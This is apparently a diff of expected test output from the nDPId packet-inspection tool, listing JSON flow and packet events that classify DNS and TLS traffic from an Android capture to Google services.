+00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+01033{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+01147{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}}
+01074{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1582454871292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454871292,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq9RAAEARCXbAqAIQwKgCAbUXADUALUF1Da4BAAABAAAAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAQ=="}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871292,"flow_last_seen":1582454871292,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871292,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1582454871294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1582454871294,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRfN0AAEAReF3AqAIBwKgCEAA1tRcAPWwTDa6BgAABAAEAAAAACGFjY291bnRzBmdvb2dsZQNjb20AAAEAAcAMAAEAAQAAANoABNjvJng="}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871294,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":276,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871294,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"accounts.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871321,"flow_last_seen":1582454871321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871321,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454871321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871321,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8nfFAAEAG2qrAqAIQ2O8meIDmAbsuQarwAAAAAKAC\/\/\/zCgAAAgQFtAQCCAr\/\/zcBAAAAAAEDAwg="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454871334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871334,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8saEAAHUG0frY7yZ4wKgCEAG7gOY64cVhLkGq8aAS6yCKsAAAAgQFZAQCCAofL14G\/\/83AQEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1582454871335,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871335,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0nfJAAEAG2rHAqAIQ2O8meIDmAbsuQarxOuHFYoAQAVei8wAAAQEICv\/\/NwUfL14G"}
-00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871321,"flow_last_seen":1582454871339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454871339,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1582454871343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"ts_msec":1582454871343,"pkt":"xiwDYGpkTGr2n\/YnCABFAABQq9VAAEARCWbAqAIQwKgCAYtpADUAPJHqlgwBAAABAAAAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAQ=="}
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871343,"flow_last_seen":1582454871343,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1582454871343,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871321,"flow_last_seen":1582454871370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1582454871370,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"accounts.google.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1582454871383,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1582454871383,"pkt":"TGr2n\/YnxiwDYGpkCABFAABgqGIAAEARTMnAqAIBwKgCEAA1i2kATI9glgyBgAABAAEAAAAAE3NlbWFudGljbG9jYXRpb24tcGEKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAALIABKzZFEo="}
-00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1582454871383,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}}
+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":310,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"ts_msec":1582454871383,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"semanticlocation-pa.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1582454871496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1582454871496,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBq+5AAEARCVzAqAIQwKgCAVlCADUALUQf0TEBAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871496,"flow_last_seen":1582454871496,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454871496,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1582454871536,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1582454871536,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRnZYAAEARV6TAqAIBwKgCEAA1WUIAPff70TGBgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871536,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":332,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454871536,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871553,"flow_last_seen":1582454871553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454871553,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1582454871553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871553,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8o7ZAAEAGEyjAqAIQrNkUTKpyAbt9gJSNAAAAAKAC\/\/\/OqgAAAgQFtAQCCAr\/\/zc7AAAAAAEDAwg="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1582454871591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454871591,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8n5IAAHUGIkys2RRMwKgCEAG7qnIP+mJJfYCUjqAS6yAAJQAAAgQFZAQCCAqRSuAV\/\/83OwEDAwg="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1582454871592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454871592,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0o7dAAEAGEy\/AqAIQrNkUTKpyAbt9gJSOD\/piSoAQAVcYYgAAAQEICv\/\/N0WRSuAV"}
